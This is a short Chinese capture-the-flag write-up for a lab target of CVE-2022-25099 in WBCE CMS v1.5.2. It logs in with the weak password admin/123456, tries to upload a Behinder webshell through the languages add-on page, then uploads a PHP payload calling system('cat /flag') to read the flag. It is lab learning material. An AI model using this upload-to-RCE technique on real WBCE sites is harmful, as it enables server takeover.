春秋云镜 CVE-2022-25099
春秋云镜 CVE-2022-25099 WBCE CMS v1.5.2 RCE
靶标介绍
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
启动场景
漏洞利用
打开首页提示网站正在建设,随手/admin跳转登录页面
http://eci-2zebhcoic1xyruwapftd.cloudeci1.ichunqiu.com/admin/login/
admin/123456弱口令登录成功
寻找上传点languages/index.php,“Add-ons”–“languages” 上传冰蝎马,失败。
上传phphinfo成功,
那就直接system执行cat /flag
system('cat /flag');phpinfo();?>
?>
得到flag
flag{6c6dfde2-f367-4424-b6c8-bf37f968b622}
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!